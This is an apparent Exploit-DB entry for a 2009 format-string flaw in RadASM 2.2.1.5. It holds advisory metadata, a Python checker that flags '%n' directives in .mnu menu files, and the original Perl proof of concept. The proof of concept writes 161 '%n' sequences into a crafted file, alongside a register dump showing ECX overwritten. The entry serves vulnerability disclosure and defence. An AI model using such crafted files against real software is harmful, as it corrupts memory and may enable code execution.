Vendor: RadASM
By: SkuLL-HacKeR
CVSS: 7.5 (HIGH)
Type: Format String
CWE: 134
Product Name: RadASM
Affected Version From: 2.2.1.5
Affected Version To: 2.2.1.5
Patch Exists: NO
Related CWE: N/A
CPE: a:radasm:radasm:2.2.1.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

RadASM 2.2.1.5 (.mnu File) Format String PoC

RadASM 2.2.1.5 is vulnerable to a format string vulnerability. By creating a specially crafted .mnu file, an attacker can overwrite the ECX register and execute arbitrary code. The vulnerability is triggered when the application attempts to open the malicious .mnu file.

Mitigation:

No known mitigation or remediation is available for this vulnerability.
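
A pre-open triage check for this file type, as an added example (not part of the original advisory or of RadASM): it counts printf-style conversion directives in a .mnu file and flags any `%n`. The block/review policy, the threshold and the sample file contents are assumptions constructed for illustration; the check only flags suspect files and leaves the parser itself unchanged.

```python
import re

# One printf conversion: %[flags][width][.precision][length]conversion.
# "%%" is matched too so an escaped percent is consumed and not misread.
SPEC = re.compile(
    rb"%[-+ #0]*(?:\*|\d+)?(?:\.(?:\*|\d+))?"
    rb"(?:hh|h|ll|l|L|j|z|t|I64|I32)?([diouxXeEfFgGaAcspn%])"
)

def normalize(data: bytes) -> bytes:
    """Fold UTF-16LE text (with or without BOM) to single bytes for scanning."""
    if data.startswith(b"\xff\xfe"):
        data = data[2:]
    if len(data) >= 4 and len(data) % 2 == 0 and not any(data[1::2]):
        return data[0::2]
    return data

def count_directives(data: bytes) -> dict:
    """Return {conversion letter: count} for every directive in the file."""
    counts = {}
    for m in SPEC.finditer(normalize(data)):
        conv = m.group(1).decode("ascii")
        if conv != "%":                      # "%%" is a literal percent sign
            counts[conv] = counts.get(conv, 0) + 1
    return counts

def triage(data: bytes, review_threshold: int = 4) -> str:
    """Assumed policy: any %n blocks the file; many other directives need review."""
    counts = count_directives(data)
    if counts.get("n", 0):
        return "block"
    if sum(counts.values()) >= review_threshold:
        return "review"
    return "ok"

# Constructed samples (not real RadASM menu files).
SAMPLES = {
    "crafted.mnu": b"%n" * 161,                        # same shape as the PoC output
    "crafted16.mnu": b"\xff\xfe" + ("%n" * 8).encode("utf-16-le"),
    "benign.mnu": b"File,Open 100%% zoom,Exit",
    "probe.mnu": b"%x.%x.%x.%08x",
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(name, triage(blob), count_directives(blob))
```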
Source

Exploit-DB raw data:

# RadASM 2.2.1.5 (.mnu File) Format string Poc
# By SkuLL-HacKeR
# GreetZ : hack4love - Aser ro7 - ThE g0bL!N - Qabandi
# EAX 00002E2E
# ECX 41413D92 ECX overwritten
# EDX 00000002
# EBX 00000000
# ESP 0013F894
# EBP 0013F9AC ASCII "..................................................................."
# ESI 00187658 ASCII "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"
# EDI 0013FFFE
# EIP 0040171A TbrCreat.0040171A
# directory app
# C:\Documents and Settings\Administrateur\Bureau\aRadASM\AddIns\TbrCreate.exe
# I think it is hard to exploit; maybe anyone can exploit it :d
my $unicode="%n" x 161;
my $file="xpl.mnu";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $unicode ;
close($FILE);
print "$file has been created \n";

# milw0rm.com [2009-08-03]